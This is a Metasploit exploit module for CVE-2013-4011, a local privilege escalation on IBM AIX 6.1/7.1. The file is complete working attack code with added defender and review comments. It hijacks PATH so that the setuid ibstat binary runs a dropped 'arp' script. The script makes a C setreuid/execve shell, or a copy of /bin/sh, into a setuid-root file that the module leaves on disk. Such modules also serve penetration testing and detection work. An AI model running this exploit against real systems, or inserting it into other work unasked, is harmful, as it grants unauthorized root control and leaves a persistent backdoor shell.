metasploit-framework/modules/exploits/aix/local/ibstat_path.rb


# Not sure if the deps are correct
require 'msf/core'
require 'rex'
# Local privilege escalation for CVE-2013-4011 on IBM AIX 6.1 / 7.1.
#
# The module drops a script named 'arp' into WritableDir, puts '.' at the
# front of PATH, and then runs the setuid binary ibstat; the dropped 'arp'
# runs in ibstat's context and turns a helper file into a setuid-root
# shell. The vendor fixes are the two IBM references below (IV43827 /
# IV43756).
#
# Defender notes (derived from what the module does, not from vendor docs):
# - Indicators: a file literally named 'arp' appearing in a user-writable
#   directory, ibstat executed with a PATH that begins with '.', and a new
#   setuid-root file (mode 4555) next to it.
# - The setuid helper created at root_file is NOT removed by the module;
#   only the 'arp' script (and the .c source, in the gcc branch) are cleaned
#   up, so a successful run leaves a setuid-root shell on disk.
# - is_vuln only inspects the mode string of ibstat, so a patched but still
#   setuid ibstat would also be reported as vulnerable.
class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  # Module metadata and the single WritableDir option.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info={})
    super( update_info( info, {
      'Name' => 'ibstat $PATH Privilege Escalation',
      'Description' => %q{
        This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
      },
      'Author' =>
        [
          'Kristian Erik Hermansen', #original author
          'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', #msf module
          'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module
        ],
      'References' =>
        [
          [ 'CVE', '2013-4011' ],
          [ 'OSVDB', '95420' ],
          [ 'BID', '61287' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
        ],
      'Platform' => [ 'aix' ],
      'Arch' => [ 'ppc' ],
      'Targets' =>
        [
          [
            'IBM AIX Version 6.1',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'AIX' => '6.1',
            }
          ],
          [
            'IBM AIX Version 7.1',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'AIX' => '7.1',
            }
          ],
        ],
      # Index 1 selects the AIX 7.1 target.
      'DefaultTarget' => 1,
    }
    ))
    # WritableDir is used both for the 'arp' script and for the helper
    # binary. The default "." is relied on below: PATH is set to ".:$PATH",
    # so the dropped 'arp' is only found if it sits in the session's current
    # directory.
    register_options([
      OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
    ], self.class)
  end

  # Main flow: vulnerability check, helper creation, 'arp' drop, PATH
  # change, trigger, cleanup of the 'arp' script, and a root check.
  #
  # @return [nil] returns early when is_vuln reports false
  def exploit
    if not is_vuln()
      return
    end
    # Helper that the fake 'arp' will chown/chmod to setuid root; random
    # 8-letter name inside WritableDir.
    root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
    # Must be named exactly 'arp': that is the command name ibstat resolves
    # through PATH.
    arp_file = "#{datastore["WritableDir"]}/arp"
    if (is_gcc_installed == true)
      # With gcc available, the helper is a small C program that calls
      # setreuid/setregid(0,0) and execs /bin/sh (see write_c_file); the
      # source is deleted after compilation.
      write_c_file("#{root_file}")
      print_status("Compiling source...")
      cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
      print_status("Compilation completed")
      print_status("Deleting source...")
      cmd_exec "rm #{root_file}.c"
    else
      # Without gcc, a plain copy of /bin/sh serves as the helper.
      cmd_exec "cp /bin/sh " + "#{root_file}"
    end
    print_status("Writing custom arp file...")
    write_arp_file("#{arp_file}","#{root_file}")
    print_status("Custom arp file written")
    print_status("Updating PATH environment variable...")
    # NOTE(review): the assignment and the export are two separate cmd_exec
    # calls; they only reach the ibstat invocation below if the session
    # keeps a single shell alive between commands — confirm per session type.
    cmd_exec 'PATH=.:$PATH'
    cmd_exec 'export PATH'
    print_status("Triggering vulnerablity...")
    # NOTE(review): is_vuln inspects /usr/sbin/ibstat while the trigger runs
    # /usr/bin/ibstat — confirm both paths resolve to the same binary.
    cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
    print_status("Removing custom arp...")
    # Only the 'arp' script is removed here; root_file (now setuid root if the
    # trigger worked) is left in place after verify_root.
    cmd_exec "rm #{arp_file}"
    print_status("Checking root privileges...")
    verify_root("#{root_file}")
  end

  # Looks for a "gcc version" line in the output of `gcc -v`.
  #
  # @return [Boolean] true when such a line is found, false otherwise
  def is_gcc_installed
    print_status("Checking if gcc exists...")
    # NOTE(review): assumes cmd_exec returns a String; a nil return would
    # raise on split — confirm against the session implementation.
    gcc_version = cmd_exec 'gcc -v'
    gcc_array = gcc_version.split("\n")
    gcc_array.each do |res|
      if res.include? ("gcc version")
        print_good("gcc found! " + "(" + "#{res}" + ")")
        return true
      end
    end
    print_status("gcc not found. Using /bin/sh from local system")
    return false;
  end

  # Writes a minimal C source file (filename + ".c") line by line with echo.
  # The program calls setreuid(0,0) and setregid(0,0), then
  # execve("/bin/sh", NULL, NULL); the triple-escaped quotes on the execve
  # line are what produce the literal double quotes in the file.
  #
  # NOTE(review): the first echo carries a literal "\n" after the #include;
  # whether the remote echo expands it is shell-dependent — confirm.
  #
  # @param filename [String] path of the helper binary; ".c" is appended
  def write_c_file(filename)
    c_file = filename + ".c"
    print_status("Dropping file " + c_file + "...")
    cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
    cmd_exec "echo \"int main()\" >> " + c_file
    cmd_exec "echo \"{\" >> " + c_file
    cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
    cmd_exec "echo \"setregid(0,0);\" >> " + c_file
    cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
    cmd_exec "echo \"return 0;\" >> " + c_file
    cmd_exec "echo \"}\" >> " + c_file
  end

  # Writes the fake 'arp' shell script and makes it executable (mode 0555).
  # When ibstat runs it with elevated privileges, the script chowns bin_file
  # to root and sets mode 4555 on it (setuid root, read/execute for all).
  #
  # @param arp_file [String] path of the script to create
  # @param bin_file [String] path of the helper to turn into a setuid-root file
  def write_arp_file(arp_file, bin_file)
    cmd_exec "echo \"#!/bin/sh\" > " + arp_file
    cmd_exec "echo \"chown root " + bin_file + "\" >> " + arp_file
    cmd_exec "echo \"chmod 4555 " + bin_file + "\" >> " + arp_file
    cmd_exec "chmod 0555 " + arp_file
  end

  # Runs the helper and inspects `id` for a root uid/euid.
  #
  # NOTE(review): the helper is executed via cmd_exec and `id` is a separate
  # cmd_exec call; this only observes root if the helper's shell replaces
  # the session's shell for subsequent commands — confirm.
  #
  # @param filename [String] path of the (hopefully setuid-root) helper
  def verify_root(filename)
    cmd_exec filename
    id_output = cmd_exec "id"
    if id_output.include? ("euid=0(root)")
      print_good("Got root! (euid)")
    elsif id_output.include?("uid=0(root)")
      print_good("Got root!")
    else
      print_status("Exploit failed")
    end
  end

  # Reports the target as vulnerable when /usr/sbin/ibstat has mode
  # -r-sr-xr-x (setuid bit set). This is a permission check only; it does
  # not distinguish a patched setuid ibstat from an unpatched one.
  #
  # @return [Boolean]
  def is_vuln()
    ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
    if ls_output.include? ("-r-sr-xr-x")
      print_good("Target is vulnerable")
      return true
    else
      print_status("Target is not vulnerable")
      return false
    end
  end
end